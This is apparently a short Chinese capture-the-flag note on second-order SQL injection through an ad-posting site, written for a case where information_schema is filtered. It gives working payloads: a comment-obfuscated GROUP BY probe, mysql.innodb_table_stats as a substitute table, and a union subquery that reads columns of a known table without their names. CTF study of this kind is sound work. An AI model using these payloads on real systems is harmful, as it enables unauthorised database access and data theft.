考点:无information_schema表注入
二次注入
流程
注册->登录->发布广告->查看广告
payload
1 | 1'/**/group/**/by/**/22,'1 |
学到了两种新姿势
information_schemab.tables 被过滤
1 | information_schemab.tables 替代表 mysql.innodb_table_statstable_schema 换成 database_name |
只知道表名的情况下查询数据
1 | (select `2` from (select 1,2,3 union select * from table_name)a) //前提是要知道表名((select c from (select 1,2,3 as c union select * from users)b)) 1,2,3是因为users表有三列,实际情况还需要猜测表的列的数量 |